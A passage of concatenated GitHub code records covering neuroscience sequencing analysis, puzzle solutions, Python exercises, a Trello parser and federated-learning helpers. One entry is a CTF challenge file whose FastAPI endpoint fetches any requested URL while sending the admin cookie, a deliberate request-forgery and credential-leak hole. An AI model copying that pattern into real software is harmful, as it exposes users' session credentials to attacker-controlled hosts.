df1[c] = fillval\n \n scol = natsorted(list(df1.columns))\n df1 = df1[scol]\n scol = natsorted(list(df2.columns))\n df2 = df2[scol] \n logging.debug(f'df1 col={df1.columns}')\n logging.debug(f'df2 col={df2.columns}') \n else:\n logging.debug('matrix columns match.')\n \n return (df1, df2)\n\n\ndef filter_non_injection(rtdf, ridf, min_injection=1):\n '''\n rtdf and ridf should already be filtered by brain, type, and anything else that might complicate matters.\n remove rows from rtdf that do not have at least value in the row \n of ridf with the same index (VBC sequence)\n Does an inner join() on the dataframes, keyed on sequence. \n Keeps values and columns from first argument (rtdf)\n \n '''\n logging.debug(f'before threshold inj df len={len(ridf)}')\n ridf = ridf[ridf.counts >= min_injection]\n ridf.reset_index(inplace=True, drop=True)\n logging.debug(f'before threshold inj df len={len(ridf)}') \n \n mdf = pd.merge(rtdf, ridf, how='inner', left_on='sequence', right_on='sequence')\n incol = mdf.columns\n outcol = []\n selcol =[]\n for c in incol:\n if not c.endswith('_y'):\n selcol.append(c)\n outcol.append(c.replace('_x',''))\n mdf = mdf[selcol]\n mdf.columns = outcol\n logging.debug(f'created merged/joined DF w/ common sequence items. df=\\n{mdf}')\n return mdf\n\ndef filter_min_target(df, min_target=1):\n '''\n \n '''\n logging.debug(f'before threshold inj df len={len(ridf)}')\n ridf = ridf[ridf.counts >= min_injection]\n ridf.reset_index(inplace=True, drop=True)\n logging.debug(f'before threshold inj df len={len(ridf)}') \n \n mdf = pd.merge(rtdf, ridf, how='inner', left_on='sequence', right_on='sequence')\n incol = mdf.columns\n outcol = []\n selcol =[]\n for c in incol:\n if not c.endswith('_y'):\n selcol.append(c)\n outcol.append(c.replace('_x',''))\n mdf = mdf[selcol]\n mdf.columns = outcol\n logging.debug(f'created merged/joined DF w/ common sequence items. df=\\n{mdf}')\n return mdf \n\n\ndef process_merged(config, filelist, outdir=None, expid=None, recursion=200000, combined_pdf=True, label_column='region' ):\n '''\n takes in combined 'all' TSVs. columns=(sequence, counts, type, label, brain, site) \n outputs brain-specific SSI x target matrix DF, with counts normalized to spikeins by target. \n writes all output to outdir (or current dir). \n \n '''\n from matplotlib.backends.backend_pdf import PdfPages as pdfpages\n sys.setrecursionlimit(recursion) \n \n logging.debug(f'{filelist}')\n \n alldf = merge_tsvs(filelist)\n logging.debug(f'alldf len={len(alldf)}')\n \n cmap = config.get('plots','heatmap_cmap')\n require_injection = config.getboolean('analysis','require_injection')\n min_injection = int(config.get('analysis','min_injection'))\n min_target = int(config.get('analysis','min_target')) \n clustermap_scale = config.get('plots','clustermap_scale') # log10 | log2\n \n if expid is None:\n expid = 'MAPseq'\n \n if outdir is None:\n outdir = './'\n \n outfile = os.path.join(outdir, f'{expid}.all.heatmap.pdf')\n if require_injection:\n outfile = os.path.join(outdir, f'{expid}.all.{min_injection}.{min_target}.{clustermap_scale}.pdf')\n else:\n outfile = os.path.join(outdir, f'{expid}.all.noinj.{min_target}.{clustermap_scale}.pdf')\n logging.debug(f'running exp={expid} min_injection={min_injection} min_target={min_target} cmap={cmap} clustermap_scale={clustermap_scale} ')\n \n # list to handle return information. \n # {\n # B1 : [rbcm, sbcm, nbcm],\n # B2 : [rbcm, sbcm, nbcm]\n # }\n brainlist = {}\n \n \n page_dims = (11.7, 8.27)\n with pdfpages(outfile) as pdfpages:\n bidlist = list(alldf['brain'].dropna().unique())\n bidlist = [ x for x in bidlist if len(x) > 0 ]\n bidlist.sort()\n logging.debug(f'handling brain list: {bidlist}')\n for brain_id in bidlist:\n valid = True\n logging.debug(f'handling brain_id={brain_id}')\n bdf = alldf[alldf['brain'] == brain_id]\n \n # handle target areas...\n tdf = bdf[bdf['site'].str.startswith('target')]\n rtdf = tdf[tdf['type'] == 'real'] \n\n # threshold by min_target ...\n # or threshold by target-negative\n if min_target > 1:\n before = len(rtdf)\n rtdf = rtdf[rtdf['counts'] >= min_target]\n rtdf.reset_index(inplace=True, drop=True)\n logging.debug(f'filtering by min_target={min_target} before={before} after={len(rtdf)}')\n else:\n logging.debug(f'min_target={min_target} no filtering.')\n \n if require_injection:\n # extract and filter injection areas.\n logging.debug(f'require_injection={require_injection} min_injection={min_injection}') \n idf = bdf[bdf['site'].str.startswith('injection')]\n ridf = idf[idf['type'] == 'real'] \n if len(ridf) == 0:\n logging.warning('require_injection=True but no real VBCs from any injection site.')\n logging.debug(f'{len(rtdf)} real target VBCs before filtering.') \n frtdf = filter_non_injection(rtdf, ridf, min_injection=min_injection)\n logging.debug(f'{len(rtdf)} real target VBCs after injection filtering.')\n if not len(rtdf) > 0:\n logging.warning(f'No VBCs passed injection filtering! Skip brain.')\n valid = False\n else:\n logging.debug(f'require_injection={require_injection} proceeding...')\n frtdf = rtdf\n \n # make \n if valid: \n rbcmdf = frtdf.pivot(index='sequence',columns=label_column, values='counts')\n scol = natsorted(list(rbcmdf.columns))\n rbcmdf = rbcmdf[scol]\n rbcmdf.fillna(value=0, inplace=True)\n logging.debug(f'brain={brain_id} real barcode matrix len={len(rbcmdf)}')\n \n # spikes\n sdf = tdf[tdf['type'] == 'spike']\n sbcmdf = sdf.pivot(index='sequence', columns=label_column, values='counts')\n spcol = natsorted(list(sbcmdf.columns))\n sbcmdf = sbcmdf[spcol]\n sbcmdf.fillna(value=0, inplace=True) \n logging.debug(f'brain={brain_id} spike barcode matrix len={len(sbcmdf)}')\n \n (rbcmdf, sbcmdf) = sync_columns(rbcmdf, sbcmdf)\n \n nbcmdf = normalize_weight(rbcmdf, sbcmdf)\n logging.debug(f'nbcmdf.describe()=\\n{nbcmdf.describe()}')\n \n # store output. \n brainlist[brain_id] = [rbcmdf, sbcmdf, nbcmdf]\n \n scbcmdf = normalize_scale(nbcmdf, logscale=clustermap_scale)\n scbcmdf.fillna(value=0, inplace=True)\n logging.debug(f'scbcmdf.describe()=\\n{scbcmdf.describe()}')\n \n rbcmdf.to_csv(f'{outdir}/{brain_id}.rbcm.tsv', sep='\\t')\n sbcmdf.to_csv(f'{outdir}/{brain_id}.sbcm.tsv', sep='\\t') \n nbcmdf.to_csv(f'{outdir}/{brain_id}.nbcm.tsv', sep='\\t')\n scbcmdf.to_csv(f'{outdir}/{brain_id}.scbcm.tsv', sep='\\t')\n \n # check to ensure no columns are missing barcodes.\n droplist = []\n for c in scbcmdf.columns:\n if not scbcmdf[c].sum() > 0:\n logging.warn(f'columns {c} for brain {brain_id} has no barcodes, dropping...')\n droplist.append(c)\n logging.debug(f'dropping columns {droplist}')\n scbcmdf.drop(droplist,inplace=True, axis=1 ) \n \n \n try:\n kws = dict(cbar_kws=dict(orientation='horizontal')) \n g = sns.clustermap(scbcmdf, cmap=cmap, yticklabels=False, col_cluster=False, standard_scale=1, **kws)\n #g.ax_cbar.set_title('scaled log10(cts)')\n x0, _y0, _w, _h = g.cbar_pos\n #g.ax_cbar.set_position((0.8, .2, .03, .4))\n g.ax_cbar.set_position([x0, 0.9, g.ax_row_dendrogram.get_position().width, 0.05])\n g.fig.suptitle(f'{expid} {brain_id}')\n g.ax_heatmap.set_title(f'Scaled {clustermap_scale}(counts)')\n plt.savefig(f'{outdir}/{brain_id}.{clustermap_scale}.clustermap.pdf')\n if combined_pdf:\n logging.info(f'saving plot to {outfile} ...')\n pdfpages.savefig(g.fig)\n except Exception as ee:\n logging.warning(f'Unable to clustermap plot for {brain_id}. Message: {ee}')\n \n logging.info(f'done with brain={brain_id}')\n return brainlist\n\ndef process_merged_new(config, filelist, outdir=None, expid=None, recursion=200000, combined_pdf=True, label_column='region' ):\n '''\n takes in combined 'all' TSVs. columns=(sequence, counts, type, label, brain, site) \n outputs brain-specific SSI x target matrix DF, with counts normalized to spikeins by target. \n writes all output to outdir (or current dir). \n \n '''\n logging.debug(f'{filelist}') \n alldf = merge_tsvs(filelist)\n logging.debug(f'alldf len={len(alldf)}')\n if outdir is None:\n outdir = './'\n\n require_injection = config.getboolean('analysis','require_injection')\n min_injection = int(config.get('analysis','min_injection'))\n min_target = int(config.get('analysis','min_target')) \n use_target_negative=bool(config.get('analysis','use_target_negative'))\n \n if expid is None:\n expid = 'MAPseq'\n \n logging.debug(f'running exp={expid} min_injection={min_injection} min_target={min_target} use_target_negative={use_target_negative} ')\n\n bidlist = list(alldf['brain'].dropna().unique())\n bidlist = [ x for x in bidlist if len(x) > 0 ]\n bidlist.sort()\n logging.debug(f'handling brain list: {bidlist}')\n for brain_id in bidlist:\n valid = True\n logging.debug(f'handling brain_id={brain_id}')\n bdf = alldf[alldf['brain'] == brain_id]\n \n # handle target areas...\n tdf = bdf[bdf['site'].str.startswith('target')]\n rtdf = tdf[tdf['type'] == 'real'] \n\n # threshold by min_target or threshold by target-negative\n # if use_target_negative is true, but no target negative site \n # defined, use min_target and throw warning. \n if use_target_negative:\n min_target = calc_min_target(config, bdf)\n if tcount != 0:\n logging.debug(f'non-zero target-negative UMI count = {tcount}')\n\n if min_target > 1:\n before = len(rtdf)\n rtdf = rtdf[rtdf['counts'] >= min_target]\n rtdf.reset_index(inplace=True, drop=True)\n logging.debug(f'filtering by min_target={min_target} before={before} after={len(rtdf)}')\n else:\n logging.debug(f'min_target={min_target} no filtering.')\n \n if require_injection:\n # extract and filter injection areas.\n logging.debug(f'require_injection={require_injection} min_injection={min_injection}') \n idf = bdf[bdf['site'].str.startswith('injection')]\n ridf = idf[idf['type'] == 'real'] \n if len(ridf) == 0:\n logging.warning('require_injection=True but no real VBCs from any injection site.')\n logging.debug(f'{len(rtdf)} real target VBCs before filtering.') \n frtdf = filter_non_injection(rtdf, ridf, min_injection=min_injection)\n logging.debug(f'{len(rtdf)} real target VBCs after injection filtering.')\n if not len(rtdf) > 0:\n logging.warning(f'No VBCs passed injection filtering! Skip brain.')\n valid = False\n else:\n logging.debug(f'require_injection={require_injection} proceeding...')\n frtdf = rtdf\n \n # make \n if valid: \n rbcmdf = frtdf.pivot(index='sequence',columns=label_column, values='counts')\n scol = natsorted(list(rbcmdf.columns))\n rbcmdf = rbcmdf[scol]\n rbcmdf.fillna(value=0, inplace=True)\n logging.debug(f'brain={brain_id} real barcode matrix len={len(rbcmdf)}')\n # spikes\n sdf = tdf[tdf['type'] == 'spike']\n sbcmdf = sdf.pivot(index='sequence', columns=label_column, values='counts')\n spcol = natsorted(list(sbcmdf.columns))\n sbcmdf = sbcmdf[spcol]\n sbcmdf.fillna(value=0, inplace=True) \n logging.debug(f'brain={brain_id} spike barcode matrix len={len(sbcmdf)}')\n \n (rbcmdf, sbcmdf) = sync_columns(rbcmdf, sbcmdf)\n \n nbcmdf = normalize_weight(rbcmdf, sbcmdf)\n logging.debug(f'nbcmdf.describe()=\\n{nbcmdf.describe()}')\n scbcmdf = normalize_scale(nbcmdf, logscale=clustermap_scale)\n scbcmdf.fillna(value=0, inplace=True)\n logging.debug(f'scbcmdf.describe()=\\n{scbcmdf.describe()}')\n \n rbcmdf.to_csv(f'{outdir}/{brain_id}.rbcm.tsv', sep='\\t')\n sbcmdf.to_csv(f'{outdir}/{brain_id}.sbcm.tsv', sep='\\t') \n nbcmdf.to_csv(f'{outdir}/{brain_id}.nbcm.tsv', sep='\\t')\n scbcmdf.to_csv(f'{outdir}/{brain_id}.scbcm.tsv', sep='\\t')\n \n # check to ensure no columns are missing barcodes.\n droplist = []\n for c in scbcmdf.columns:\n if not scbcmdf[c].sum() > 0:\n logging.warn(f'columns {c} for brain {brain_id} has no barcodes, dropping...')\n droplist.append(c)\n logging.debug(f'dropping columns {droplist}')\n scbcmdf.drop(droplist,inplace=True, axis=1 ) \n \n \n try:\n kws = dict(cbar_kws=dict(orientation='horizontal')) \n g = sns.clustermap(scbcmdf, cmap=cmap, yticklabels=False, col_cluster=False, standard_scale=1, **kws)\n #g.ax_cbar.set_title('scaled log10(cts)')\n x0, _y0, _w, _h = g.cbar_pos\n #g.ax_cbar.set_position((0.8, .2, .03, .4))\n g.ax_cbar.set_position([x0, 0.9, g.ax_row_dendrogram.get_position().width, 0.05])\n g.fig.suptitle(f'{expid} {brain_id}')\n g.ax_heatmap.set_title(f'Scaled {clustermap_scale}(counts)')\n plt.savefig(f'{outdir}/{brain_id}.{clustermap_scale}.clustermap.pdf')\n if combined_pdf:\n logging.info(f'saving plot to {outfile} ...')\n pdfpages.savefig(g.fig)\n except Exception as ee:\n logging.warning(f'Unable to clustermap plot for {brain_id}. Message: {ee}')\n \n logging.info(f'done with brain={brain_id}')\n\ndef make_merged_plots_new(config, outdir=None, expid=None, recursion=200000, combined_pdf=True, label_column='region' ):\n '''\n consume barcode matrices and create heatmap plots.\n '''\n\n\n\ndef process_qc(config, exp_dir ):\n '''\n consume files in standard directories and generate qc stats and analysis report..\n \n '''\n pass\n\n\ndef process_mapseq_dir(exp_id, loglevel, force):\n '''\n \n process_fastq.py -d/-v -force -b barcode_v2..txt -s _sampleinfo.jrh.xlsx -O fastq.out fastq/*.fastq* \n process_ssifasta.py -d/-v -s _sampleinfo.jrh.xlsx -o .all.tsv -O ssi.out \n process_merged.py -d/-v -e --combined -s _sampleinfo.jrh.xlsx -O merged.out \n \n ''' \n d = os.path.abspath(exp_id)\n if not os.path.exists(d):\n sys.exit(f'Experiment directory {d} does not exist.')\n\n logging.info(f'processing experiment dir: {d}')\n \n config = get_default_config()\n expconfig = f'{d}/mapseq.conf'\n\n if os.path.exists(expconfig):\n config.read(expconfig)\n logging.debug(f'read {expconfig}')\n \n \n try:\n samplefile = f'{d}/{exp_id}_sampleinfo.jrh.xlsx'\n sampdf = load_sample_info(config, samplefile)\n rtlist = get_rtlist(sampdf)\n \n outdir = f'{d}/fastq.out'\n bcfile = f'{d}/barcode_v2.{exp_id}.txt' \n bclist = load_barcodes(config, bcfile, labels=rtlist, outdir=outdir)\n readfilelist = package_pairfiles( glob.glob(f'{d}/fastq/*.fastq*'))\n\n logging.info(f'running process_fastq_pairs. readfilelist={readfilelist} outdir={outdir}')\n process_fastq_pairs(config, readfilelist, bclist, outdir, force=False)\n \n \n #process_ssifasta(config, infile, outdir=None, site=None)\n #process_merged(config, filelist, outdir=None, expid=None, recursion=100000, combined_pdf=True)\n #process_qc(config, exp_dir)\n\n except Exception as ex:\n logging.error(f'error while handling {d} ')\n logging.warning(traceback.format_exc(None))\n \n\n\n\n","repo_name":"ZadorLaboratory/mapseq-processing","sub_path":"mapseq/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":66783,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"73591138490","text":"from Utils import *\n\n# Part 1\n\ninp = rdl(\"22.txt\")[2:]\n\n# inp = \"\"\"Filesystem Size Used Avail Use%\n# /dev/grid/node-x0-y0 10T 8T 2T 80%\n# /dev/grid/node-x0-y1 11T 6T 5T 54%\n# /dev/grid/node-x0-y2 32T 28T 4T 87%\n# /dev/grid/node-x1-y0 9T 7T 2T 77%\n# /dev/grid/node-x1-y1 8T 0T 8T 0%\n# /dev/grid/node-x1-y2 11T 7T 4T 63%\n# /dev/grid/node-x2-y0 10T 6T 4T 60%\n# /dev/grid/node-x2-y1 9T 8T 1T 88%\n# /dev/grid/node-x2-y2 9T 6T 3T 66%\"\"\".split('\\n')[1:]\n\n\nnodes_data = [x.split(' ')[0] for x in inp]\nnode_loc = [n.split('-')[1:] for n in nodes_data]\n\ncoords = [(int(x[0][1:]), int(x[1][1:])) for x in node_loc]\n\nused = [int(x.split()[2][:-1]) for x in inp]\navail = [int(x.split()[3][:-1]) for x in inp]\n\ncount = 0\nfor a in range(len(inp)):\n for b in range(len(inp)):\n if a != b:\n if used[a] > 0 and used[a] <= avail[b]:\n count += 1\n\nprint(count)\n\n# 5:40 (10th)\n\nnodes = dict()\nfor i in range(len(coords)):\n nodes[coords[i]] = [used[i], avail[i]]\n\n\n# def get_moves(nodes, x_size, y_size):\n# moves = []\n# for n in nodes:\n# x1, y1 = n\n#\n# for x2 in range(x1 - 1, x1 + 2):\n# for y2 in range(y1 - 1, y1 + 2):\n# if 0 <= x2 <= x_size:\n# if 0 <= y2 <= y_size:\n# if not (x1 == x2 and y1 == y2):\n# if abs(x2 - x1) + abs(y2 - y1) == 1:\n# if nodes[(x2, y2)][1] >= nodes[n][0] > 0:\n# # Move data from x1, y1 to x2, y2\n# new_nodes = copy.deepcopy(nodes)\n# move_size = new_nodes[n][0]\n#\n# avail_change = move_size\n# if move_size % 1 != 0:\n# avail_change += 0.5\n#\n# new_nodes[n][0] = 0\n# new_nodes[n][1] += avail_change\n#\n# new_nodes[(x2, y2)][0] += move_size\n# new_nodes[(x2, y2)][1] -= avail_change\n#\n# moves.append(new_nodes)\n# return moves\n#\n#\n# def bfs():\n# x_size = max([n[0] for n in nodes])\n# y_size = max([n[1] for n in nodes])\n# nodes[x_size, 0][0] -= 0.5\n# goal = nodes[x_size, 0][0]\n#\n# # Get all available moves\n# queue = [[nodes]]\n# visited = set()\n# visited.add(json.dumps(list(nodes.items())))\n#\n# i = 0\n# while queue:\n# path = queue.pop(0)\n#\n# curr_nodes = path[-1]\n#\n# if curr_nodes[(0, 0)][0] == goal:\n# return len(path) - 1\n#\n# moves = get_moves(curr_nodes, x_size, y_size)\n#\n# for move in moves:\n# if json.dumps(list(move.items())) in visited:\n# continue\n#\n# visited.add(json.dumps(list(move.items())))\n# new_path = list(path)\n# new_path.append(move)\n# queue.append(new_path)\n# i += 1\n# if i % 100 == 0:\n# print(i, len(path))\n#\n# return 'No path found!'\n#\n#\n# print(bfs())\n\nfor y in range(31):\n z = ''\n for x in range(32):\n if nodes[(x, y)][0] == 0:\n z += '0 '\n elif nodes[(x, y)][0] < 150:\n z += '. '\n else:\n z += '# '\n print(z)\n\n# 1:32:20 (>100th)\n","repo_name":"bjebert/adventofcode","sub_path":"2016/22.py","file_name":"22.py","file_ext":"py","file_size_in_byte":3527,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"18516173119","text":"first_favorite_food=\"chocolate\"\nsecond_favorite_food=\"cookies\"\nthird_favorite_food=\"salad\"\nforth_favorite_food=\"cherries\"\nfifth_favorite_food=\"chicken\"\n\nfav_foods = [\"chocolate\" , \"cookies\" , \"salad\" , \"cherries\" , \"chicken\"]\n# search the list, add to it, categorize it, move them around, get length of list, change/remove an item \n# CRUD = create, read, update, delete\n\nprint(fav_foods[4]) \n\n#updatesmth in the list\nprint(fav_foods[2])\nfav_foods[2]=\"chicken\"\nprint(fav_foods[2])\n\n#include smth in the list\nfav_foods.append(\"brownies\")\nprint(fav_foods)\n\nfor food in fav_foods:\n print(\"I sure do love \" + food + \"!\")\n \n# dstamp1=[\"Derek\",\"Stampone\",30,\"Brown\",\"Brown\",5.7,185,8,True]\n# dstamp1_firstname=dstamp[0] \n\n ##key:value. called a dictionary (dict)\n# dstamp1 = {\"firstname\": \"Derek\",\n# \"lastname\": \"Stampone\"\n# \"age\": 30,\n# \"eyecolor\": \"Brown\",\n# \"haircolor\": \"Brown\",\n# \"height\": 5.8,\n# \"weight\": 185,\n# \"lucky_number\": 8,\n# \"registed_to_vote?\": True\n# }\n\n# print(dstamp1[\"lucky_number\"])\n# dstamp1[\"lucky_number\"]=7\n# dstamp1[\"ethnicity\"]=\"white\" #updates/adds to the key\n# print(dstamp1)\n\nsuperheroes = {\n \"jeff\": \"Rogue\",\n \"deanna\": \"Jessica Jones\",\n \"danny\": \"Static Shock\",\n \"ash\": \"Supergirl\",\n \"derek\": \"The Hulk\"\n}\n\nsuperheroes[\"Mary\"]=\"wonder woman\"\n\nfor person in superheroes:\n print(person)\n \nfor person in superheroes:\n print(superheroes[person])\n \nfor x in range(1,101):\n print(x)\n \nfor x in range(1,101):\n if x%2==0:\n print(x)\n \nfor x in range(1,1000000): \n if x**2 < 1000000:\n print(x**2)\n ### below is a LIST of dictionaries not a dictionary \nactors = [\n {\"name\": \"Molly Ringwald\", \"role\": \"Claire Standish\", \"grade\": 10},\n {\"name\": \"Judd Nelson\", \"role\": \"John Bender\", \"grade\": 12},\n {\"name\": \"Ally Sheedy\", \"role\": \"Allison Reynolds\", \"grade\": 11},\n {\"name\": \"Anthony Michael Hall\", \"role\": \"Brian Johnson\", \"grade\": 10}\n]\n\nprint(actors[2][\"name\"])\nprint(actors[3][\"role\"])\nprint(len(actors))\n\nfor people in actors:\n print(\"The role of \" + people[\"role\"] + \" was played by \" + people[\"name\"])\n","repo_name":"miriamshapir/leapyeartestcode","sub_path":"environment/day-3/lists.py","file_name":"lists.py","file_ext":"py","file_size_in_byte":2100,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"17081948582","text":"from trello import TrelloClient\n\nfrom matterllo.hook.card import Hook as HookCard\nfrom matterllo.hook.list import Hook as HookList\nfrom matterllo.hook.checklist import Hook as HookChecklist\nfrom matterllo.utils import logger\nfrom matterllo.utils import config\n\nLOGGING = logger()\nSETTINGS = config()\n\n\nclass Parser(HookCard, HookList, HookChecklist):\n\n def __init__(self):\n self.supported_action = HookCard.actions() + HookList.actions() + HookChecklist.actions()\n self.trello_client = TrelloClient(api_key=SETTINGS['trello_api_key'], token=SETTINGS['trello_api_token'])\n\n def __call__(self, action):\n \"\"\" Parse the event/action and return a pretty output.\n\n Args:\n action (dict): the trello action data.\n \"\"\"\n try:\n action_type = action['type']\n if action_type not in self.supported_action:\n raise NotImplementedError(action_type)\n\n action_parser = getattr(self, action_type)\n return action_parser(action=action)\n except NotImplementedError as e:\n LOGGING.info('action parsing not implemented :: {}'.format(e))\n except Exception as e:\n LOGGING.error('unable to parse the action :: {} :: {}'.format(e, action))\n","repo_name":"amir17688/google_data_p2","sub_path":"87280_parser.py_C__Users_user_Desktop_data_2_data_google_data_Lujeni_matterllo_matterllo.py","file_name":"87280_parser.py_C__Users_user_Desktop_data_2_data_google_data_Lujeni_matterllo_matterllo.py","file_ext":"py","file_size_in_byte":1265,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"38131852182","text":"from fastapi import FastAPI, Request, Response\r\nfrom dotenv import load_dotenv\r\nfrom requests import get\r\nimport os\r\n\r\nload_dotenv()\r\nadmin_cookie = os.environ.get(\"ADMIN_COOKIE\", \"FAKE_COOKIE\")\r\n\r\napp = FastAPI()\r\n\r\n\r\n@app.get(\"/\")\r\nasync def index(request: Request):\r\n \"\"\"\r\n The base service for admin site\r\n \"\"\"\r\n\r\n # Currently Work in Progress\r\n requested_service = request.query_params.get(\"service\", None)\r\n if requested_service is None:\r\n return {\"message\": \"requested service is not found\"}\r\n\r\n # Filter external parties who are not local\r\n if requested_service == \"admin_page\":\r\n return {\"message\": \"admin page is currently not a requested service\"}\r\n\r\n # Legit admin on localhost\r\n requested_url = request.query_params.get(\"url\", None)\r\n if requested_url is None:\r\n return {\"message\": \"URL is not found\"}\r\n\r\n # Testing the URL with admin\r\n response = get(requested_url, cookies={\"cookie\": admin_cookie})\r\n return Response(response.content, response.status_code)\r\n","repo_name":"sajjadium/ctf-archives","sub_path":"ctfs/GreyCatTheFlag/2023/Quals/web/Microservices/admin_page/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1036,"program_lang":"python","lang":"en","doc_type":"code","stars":490,"dataset":"github-code","pt":"77"} +{"seq_id":"38638831098","text":"\n# 导入哪个配置就是哪个配置\nfrom profiles.default import *\n\n# default可以为空\ndefault = 'local'\n\n__cur_env = None\n\n\ndef acvite_profile(profile: str,double: str=True):\n \"\"\"设置活动分支\"\"\"\n t = env.get(profile)\n if t == None:\n raise Exception(\"找不到环境变量\")\n global __cur_env\n __cur_env = {**global_env, **t}\n print('===============================active profile:%s========================================'%(profile))\n if double:\n input()\n\n\ndef set_temp_env(key, value):\n \"\"\"设置临时环境变量\"\"\"\n __cur_env[key] = value\n\n\ndef convert_env(key):\n \"\"\"获取环境变量,如果没有则初始化\"\"\"\n if __cur_env == None:\n __init_env()\n r=__cur_env[key]\n if r==None:\n raise Exception(\"没有找到对应环境变量:\"+key)\n return r\n\ndef __init_env():\n if default!=None:\n acvite_profile(default)\n else :\n global __cur_env\n __cur_env = {**global_env}","repo_name":"Jakentop/PyApi","sub_path":"env.py","file_name":"env.py","file_ext":"py","file_size_in_byte":961,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29294005197","text":"from modules.config_params import *\nfrom modules import dataset_handling as d\n\n\nclass Helpers:\n def __init__(self):\n pass\n\n\n def client_update(self, client_model, optimizer, train_loader, epoch=5):\n \"\"\"\n This function updates/trains client model on client data\n \"\"\"\n client_model.train()\n for e in range(epoch):\n for batch_idx, (data, target) in enumerate(train_loader):\n data, target = data.cuda(), target.cuda()\n optimizer.zero_grad()\n output = client_model(data)\n loss = F.nll_loss(output, target)\n loss.backward()\n optimizer.step()\n # if batch_idx % 10 == 0:\n # print('Train Epoch: {} [{}/{} ({:.0f}%)]\\tLoss: {:.6f}'.format(\n # epoch, batch_idx * len(data), len(train_loader.dataset),\n # 100. * batch_idx / len(train_loader), loss.item()))\n\n return loss.item()\n\n \n def server_aggregate(global_model, client_models,client_lens):\n \"\"\"\n This function has aggregation method 'wmean'\n wmean takes the weighted mean of the weights of models\n \"\"\"\n total = sum(client_lens)\n n = len(client_models)\n global_dict = global_model.state_dict()\n for k in global_dict.keys():\n global_dict[k] = torch.stack([client_models[i].state_dict()[k].float()*(n*client_lens[i]/total) for i in range(len(client_models))], 0).mean(0)\n global_model.load_state_dict(global_dict)\n for model in client_models:\n model.load_state_dict(global_model.state_dict())\n\n\n def test(self, global_model, test_loader):\n \"\"\"\n This function test the global model on test data \n and returns test loss and test accuracy \n \"\"\"\n global_model.eval()\n test_loss = 0\n correct = 0\n with torch.no_grad():\n for data, target in test_loader:\n data, target = data.cuda(), target.cuda()\n output = global_model(data)\n test_loss += F.nll_loss(output, target, reduction='sum').item() # sum up batch loss\n pred = output.argmax(dim=1, keepdim=True) # get the index of the max log-probability\n correct += pred.eq(target.view_as(pred)).sum().item()\n\n test_loss /= len(test_loader.dataset)\n acc = correct / len(test_loader.dataset)\n\n print('\\nTest set: Average loss: {:.4f}, Accuracy: {}/{} ({:.0f}%)\\n'.format(\n test_loss, correct, len(test_loader.dataset),\n 100. * correct / len(test_loader.dataset)))\n\n return test_loss, acc\n \n def baseline_data(self, num, datsetHandler):\n '''\n Returns baseline data loader to be used on retraining on global server\n Input:\n num : size of baseline data\n Output:\n loader: baseline data loader\n '''\n\n x_train, y_train, x_test, y_test = datsetHandler.get_cifar10()\n x , y = datsetHandler.shuffle_list_data(x_train, y_train)\n\n x, y = x[:num], y[:num]\n transform, _ = datsetHandler.get_default_data_transforms(train=True, verbose=False)\n loader = torch.utils.data.DataLoader(d.CustomImageDataset(x, y, transform), batch_size=16, shuffle=True)\n\n return loader\n \n def client_syn(self, client_model, global_model):\n '''\n This function synchronizes the client model with global model\n '''\n client_model.load_state_dict(global_model.state_dict())\n","repo_name":"pintauroo/distributed_learning","sub_path":"modules/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":3580,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"2002984046","text":"import requests\nfrom bs4 import BeautifulSoup\nimport re\nimport os\nimport json\n\nsavedir=\"uma\"\ntry:\n os.mkdir(savedir)\nexcept:\n pass\n\n# 读取JSON文件\nwith open('umaDB.json', 'r') as file:\n alldata = json.load(file)\n\nfor umaid in alldata:\n uma=alldata[umaid]\n filename=str(uma[\"gameId\"])+\"-\"+uma[\"name\"]\n print(filename)\n filename=savedir+\"/\"+filename+\".json\"\n with open(filename, 'w' ,encoding=\"utf-8\") as file:\n s=json.dumps(uma,indent=4)\n file.write(s)\n","repo_name":"hzyhhzy/UmaAi","sub_path":"Scripts/export_uma/split_umaDB.py","file_name":"split_umaDB.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"en","doc_type":"code","stars":101,"dataset":"github-code","pt":"77"} +{"seq_id":"10834146440","text":"# Alec Lahr - ENPM661 Project 1 - 15 Puzzle Problem\r\n\r\nimport numpy as np\r\n\r\n\r\n# ===================== CONVERSION FUNCTIONS ========================\r\ndef matToStr(mat):\r\n # takes in a numpy matrix state and returns the string representation\r\n tenList = list(mat.flatten()) # converts matrix to a list of strings\r\n hexString = '' # create empty string\r\n for elem in tenList: # add each element's hex conversion to the string\r\n hexString += hex(elem)[2]\r\n return hexString\r\n \r\n\r\ndef strToMat(strg):\r\n # takes in a state string and returns the state numpy matrix\r\n tempArray = np.array([]) # make empty array\r\n for char in strg: # add the decimal version of each string element to the array, convert to type int\r\n tempArray = np.append(tempArray, int(char, 16)).astype(int)\r\n return np.reshape(tempArray, (4, 4)) # convert the array to a 4x4 matrix then return it\r\n\r\n\r\n# ======================= SEARCH FUNCTIONS ==========================\r\ndef findZero(mat):\r\n # searches the state matrix for the empty space (0)\r\n (j, i) = np.argwhere(mat == 0)[0]\r\n return (i, j) # return the i, j coordinate of 0\r\n\r\n\r\ndef checkIfDuplicate(strg):\r\n # checks if the input matrix is already in nodes, returns bool\r\n for state in nodes: # cycle through all of nodes list\r\n if state[1] == strg: # compare input to state i\r\n return True # return true if match, exit for loop and function\r\n return False # returns false if nothing found in for loop\r\n\r\n\r\ndef getPossibleMoves(i, j, prevMove):\r\n # checks which moves are possible\r\n # returns a list of 4 bools indicating if that direction is okay to move in\r\n # [Up, Down, Left, Right]\r\n directions = [False, False, False, False]\r\n if i > 0 and prevMove != 'R':\r\n directions[2] = True\r\n if i < 3 and prevMove != 'L':\r\n directions[3] = True\r\n if j > 0 and prevMove != 'D':\r\n directions[0] = True\r\n if j < 3 and prevMove != 'U':\r\n directions[1] = True\r\n return directions\r\n\r\n\r\n# ======================= ACTION 